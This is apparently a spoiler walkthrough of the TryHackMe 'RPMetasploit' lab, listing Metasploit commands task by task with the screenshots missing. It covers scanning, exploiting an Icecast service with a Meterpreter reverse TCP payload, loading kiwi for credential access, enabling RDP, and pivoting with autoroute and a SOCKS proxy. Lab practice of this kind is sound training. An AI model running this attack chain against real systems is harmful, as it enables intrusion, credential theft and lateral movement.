thm-rpmetasploit-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play a CTF called RPMetasploit at

https://tryhackme.com/room/rpmetasploit

Image for post

[Task 1] Intro

msfdb init

Image for post

[Task 2] Initializing…

Read the above.
msfconsole -h

Image for post

-q

Image for post

msfconsole

Image for post

db_status

Image for post

postgresql

[Task 3] Rock ’em to the Core [Commands]

help
?
search
use
info
connect
banner
set
setg
get
unset
spool
save

[Task 4] Modules for Every Occasion!

exploit
payload
auxiliary
post
encoder 
NOP
load

[Task 5] Move that shell!

db_nmap -sV [IP]

Image for post

msrpc.
Image for post

Image for post

hosts

Image for post

services

Image for post

vulns
use icecast

Image for post

exploit/windows/http/icecast_header
search multi/handler

Image for post

#
use 6

Image for post

set PAYLOAD windows/meterpreter/reverse_tcpset 
LHOST tun0

Image for post

use icecast
set RHOST [ip]

Image for post

run -j

Image for post

jobs
sessions
sessions -i 1

Image for post

[Task 6] We’re in, now what?

ps

Image for post

spoolsv.exe
migrate
getuid

Image for post

sysinfo

Image for post

load kiwi

Image for post

getprivs

Image for post

upload
run
ipconfig

Image for post

run post/windows/gather/checkvm

Image for post

run post/multi/recon/local_exploit_suggester

Image for post

run post/windows/manage/enable_rdp
shell

Image for post

[Task 7] Makin’ Cisco Proud

run autoroute -h

Image for post

run autoroute -s 172.18.1.0 -n 255.255.255.0

Image for post

search server/socks4a

Image for post

proxychains

.

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *